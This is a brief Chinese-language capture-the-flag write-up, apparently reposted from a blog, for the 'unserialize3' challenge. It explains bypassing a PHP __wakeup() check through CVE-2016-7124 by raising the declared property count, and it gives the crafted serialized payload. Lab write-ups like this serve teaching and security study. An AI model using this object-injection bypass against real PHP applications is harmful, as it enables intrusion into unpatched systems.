unserialize3

class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code=

在code里面输入序列化的xctf,但是有__wakeup(),要绕过__wakeup,
当成员属性数目大于实际数目时可绕过wakeup方法(CVE-2016-7124)
序列化后的值为
O:4:"xctf":1:{s:4:"flag";s:3:"111";}
变为O:4:"xctf":2:{s:4:"flag";s:3:"111";}可绕过

转载于:https://www.jianshu.com/p/58d63f05a6c0

猜你喜欢

转载自blog.csdn.net/weixin_33978016/article/details/91214446